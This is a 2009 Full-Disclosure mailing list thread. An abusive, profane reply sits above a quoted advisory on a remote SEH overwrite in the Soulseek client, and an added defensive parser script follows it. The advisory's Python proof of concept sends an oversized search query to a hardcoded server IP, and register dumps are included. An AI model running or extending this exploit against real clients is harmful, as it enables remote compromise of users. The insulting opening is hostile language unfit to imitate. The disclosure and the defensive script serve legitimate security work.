It seems like you're an asshole, and it also seems you have some undisclosed brain-prick activity, which means that I should forward all the spam I get to you, including "*Ritalin solution*", get Valium, and clearly: enlarge your penis (as your girlfriend asked me to make that call for you).
Now if you please, get the fuck out of this mailing list, and get a life, kid.

2009/6/5 Pete Licoln <[email protected]>

> Seems like you have a problem with responsible disclosure, kid ;
> Do you have any family relationship with Jeremy Brown ? ;P
>
> http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments
>
> 2009/5/25 Pete Licoln <[email protected]>
>
>> Oh so you have a blog ...
>> http://g-laurent.blogspot.com/
>>
>> 2009/5/25 laurent gaffie <[email protected]>
>>
>>> =============================================
>>> - Release date: May 24th, 2009
>>> - Discovered by: Laurent Gaffié
>>> - Severity: critical
>>> =============================================
>>>
>>> I. VULNERABILITY
>>> -------------------------
>>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>>
>>> II. BACKGROUND
>>> -------------------------
>>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>>> sharing application.
>>> One of the things that makes Soulseek(tm) unique is our community and
>>> community-related features.
>>> Based on peer-to-peer technology, virtual rooms allow you to meet people with
>>> the same interests, share information, and chat freely using real-time messages
>>> in public or private.
>>> Soulseek(tm), with its built-in people matching system, is a great way to make
>>> new friends and expand your mind!"
>>>
>>> III. DESCRIPTION
>>> -------------------------
>>> The Soulseek client allows a distributed file search to be sent to one person,
>>> to everyone, or to a specific Soulseek IRC channel, allowing a user to find the
>>> files he wants in a dedicated channel, among his contacts, or on the whole
>>> network.
>>> Unfortunately this feature is vulnerable to a remote SEH overwrite, targeting a
>>> specific user or even a whole Soulseek IRC channel.
>>>
>>> IV. PROOF OF CONCEPT
>>> -------------------------
>>> This proof of concept is made to prevent an S-K party; it is only built to
>>> target the user "testt4321".
>>>
>>> To try this proof of concept, you would have to open a Soulseek client and
>>> use the username:
>>> "testt4321"
>>> with the password:
>>> "12345678"
>>> and launch this code.
>>> If you want to change the username or target a whole channel, you would have
>>> to reverse the binary protocol.
>>>
>>> #!/usr/bin/env python3
>>> import socket
>>> import struct
>>> from time import sleep
>>>
>>> # Soulseek server; change to port 2240 for the 156.* branch
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(("208.76.170.50", 2242))
>>>
>>> # First packet: u32 length (0x48), u32 code (1), username "test4321",
>>> # password "12345678", u32 0xb5, a 32-byte hex string, u32 1
>>> buffer = b"\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>>> buffer += b"\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>>> buffer += b"\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>>> buffer += b"\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>>> buffer += b"\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>>
>>> s.send(buffer)
>>> sleep(1)
>>>
>>> junk = b"\x41" * 3084                       # padding up to the SEH record
>>> next_seh = struct.pack('<L', 0x42424242)    # pointer to next SEH record
>>> seh = struct.pack('<L', 0x43434343)         # SE handler, ends up in EIP
>>> other_junk = b"\x61" * 1423
>>>
>>> # Second packet: u32 length (0x0f01), u32 code (0x2a), target username
>>> # "testt4321", u32 0x44515aa4, u32 query length (0x0ee8), then the query
>>> buffer2 = b"\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>>> buffer2 += b"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00" + junk + next_seh + seh + other_junk
>>> s.send(buffer2)
>>> sleep(1)
>>> s.recv(1024)
>>>
>>> After the query is sent, the memory will look like this:
>>> 0012FBE4 41414141
>>> 0012FBE8 42424242 Pointer to next SEH record
>>> 0012FBEC 43434343 SE handler
>>> 0012FBF0 61616161
>>>
>>> And the program will terminate with this structure:
>>> EAX 00000000
>>> ECX 43434343
>>> EDX 7C9132BC ntdll.7C9132BC
>>> EBX 00000000
>>> ESP 0012EA78
>>> EBP 0012EA98
>>> ESI 00000000
>>> EDI 00000000
>>> EIP 43434343
>>>
>>> V. BUSINESS IMPACT
>>> -------------------------
>>> An attacker could exploit this vulnerability to compromise any Soulseek
>>> client connected to the Soulseek network.
>>>
>>> VI. SYSTEMS AFFECTED
>>> -------------------------
>>> Windows, all versions, running Soulseek *
>>>
>>> VII. SOLUTION
>>> -------------------------
>>> A fast solution would be to use Nicotine-Plus
>>> (http://nicotine-plus.sourceforge.net/), a Python Soulseek client.
>>> Another quick workaround (at server level) would be to limit the search
>>> query length.
>>>
>>> VIII. REFERENCES
>>> -------------------------
>>> http://www.slsknet.org
>>>
>>> IX. CREDITS
>>> -------------------------
>>> This vulnerability has been discovered by Laurent Gaffié
>>> Laurent.gaffie{remove-this}(at)gmail.com
>>>
>>> X. REVISION HISTORY
>>> -------------------------
>>> May 24, 2009: Initial release
>>>
>>> XI. DISCLOSURE TIMELINE
>>> -------------------------
>>> July 29, 2008: Bug discovered
>>> September 03, 2008: Vendor contacted; no response.
>>> October 14, 2008: Vendor contacted; still no response.
>>> April 12, 2009: iDefense contacted.
>>> April 13, 2009: iDefense answered.
>>> April 23, 2009: Advisory sent to the iDefense contributor program.
>>> May 13, 2009: iDefense contacted, bug rejected (no reason given).
>>> May 15, 2009: iDefense recontacted; no answer.
>>> May 16, 2009: Last try to contact the Soulseek maintainers.
>>> May 24, 2009: Advisory published.
>>>
>>> XII. LEGAL NOTICES
>>> -------------------------
>>> The information contained within this advisory is supplied "as-is"
>>> with no warranties or guarantees of fitness of use or otherwise.
>>> I accept no responsibility for any damage caused by the use or
>>> misuse of this information.
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
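As an added example that is not part of this thread and not the Soulseek project's code: the PoC above ships only raw bytes, so the script below decodes those same bytes as length-prefixed frames and applies the server-side query-length cap the advisory suggests as a workaround. The framing (u32 little-endian length, u32 code, then fields, with strings as u32 length plus raw bytes) is inferred from the PoC bytes and is an assumption here, as are the code names, the field names and the two caps MAX_FRAME and MAX_QUERY. Fed the PoC's own packets it decodes the login frame cleanly, refuses the search frame for its 3816-byte query, and reports the bytes the PoC sends past its declared frame length as a bogus follow-on frame of length 0x61616161.

```python
#!/usr/bin/env python3
"""Decode the two Soulseek server messages the PoC sends and apply a
server-side length cap.  Layout is inferred from the PoC bytes, not from
a protocol spec: u32 little-endian length, u32 code, then fields; strings
are u32 length followed by raw bytes.  Code/field names and the two caps
are this example's own assumptions."""
import struct

CODE_LOGIN = 1          # code in the PoC's first packet (assumed: login)
CODE_USER_SEARCH = 42   # code in the PoC's second packet (assumed: search one user)
MAX_FRAME = 64 * 1024   # assumed cap on a frame's declared length
MAX_QUERY = 255         # assumed cap on a string field (the advisory's workaround)

# The PoC's first packet, copied byte for byte from the advisory.
POC_LOGIN = (
    b"\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
    b"\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
    b"\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
    b"\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
    b"\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
)

# The PoC's second packet, rebuilt exactly the way the advisory builds it.
POC_SEARCH = (
    b"\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
    b"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"
    + b"\x41" * 3084                      # junk
    + struct.pack("<L", 0x42424242)       # next SEH
    + struct.pack("<L", 0x43434343)       # SE handler
    + b"\x61" * 1423                      # other junk
)


class Reader:
    """Bounds-checked cursor over one frame body."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def u32(self):
        if self.pos + 4 > len(self.data):
            raise ValueError("truncated u32 at offset %d" % self.pos)
        (value,) = struct.unpack_from("<I", self.data, self.pos)
        self.pos += 4
        return value

    def string(self, limit):
        n = self.u32()
        if n > limit:
            raise ValueError("string length %d exceeds limit %d" % (n, limit))
        if self.pos + n > len(self.data):
            raise ValueError("string of %d bytes runs past frame end" % n)
        value = self.data[self.pos:self.pos + n]
        self.pos += n
        return value


def split_frames(stream):
    """Cut a byte stream into (code, body) frames.  Returns (frames, error);
    error is None only when the stream ends exactly on a frame boundary."""
    frames, pos = [], 0
    while pos < len(stream):
        if pos + 8 > len(stream):
            return frames, "truncated header at offset %d" % pos
        length, code = struct.unpack_from("<II", stream, pos)
        if length < 4 or length > MAX_FRAME:
            return frames, "frame length 0x%x at offset %d rejected" % (length, pos)
        end = pos + 4 + length
        if end > len(stream):
            return frames, "frame declares %d bytes, only %d present" % (length, len(stream) - pos - 4)
        frames.append((code, stream[pos + 8:end]))
        pos = end
    return frames, None


def parse_login(body, max_string=MAX_QUERY):
    r = Reader(body)
    return {"user": r.string(max_string), "password": r.string(max_string),
            "version": r.u32(), "hash": r.string(32), "minor": r.u32()}


def parse_user_search(body, max_query=MAX_QUERY):
    r = Reader(body)
    return {"user": r.string(max_query), "token": r.u32(), "query": r.string(max_query)}


PARSERS = {CODE_LOGIN: parse_login, CODE_USER_SEARCH: parse_user_search}


def inspect(stream):
    """Decode every frame; each entry is (code, parsed dict) or (code, reason)."""
    results = []
    frames, error = split_frames(stream)
    for code, body in frames:
        parser = PARSERS.get(code)
        if parser is None:
            results.append((code, "rejected: unhandled code %d" % code))
            continue
        try:
            results.append((code, parser(body)))
        except ValueError as exc:
            results.append((code, "rejected: %s" % exc))
    if error:
        results.append((None, "rejected: " + error))
    return results


if __name__ == "__main__":
    for name, stream in (("login", POC_LOGIN), ("search", POC_SEARCH)):
        print(name, len(stream), "bytes")
        for code, result in inspect(stream):
            print("  code", code, "->", result)
```

Raising max_query when calling parse_user_search directly lets the 3816-byte query through, and bytes 3084..3091 of it are the "BBBBCCCC" that the advisory's memory dump shows landing on the SEH record. MAX_QUERY itself is an arbitrary figure chosen for the example; the point is that the check is made on the declared length before any copy, and that the frame length is checked against a ceiling before it is trusted.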
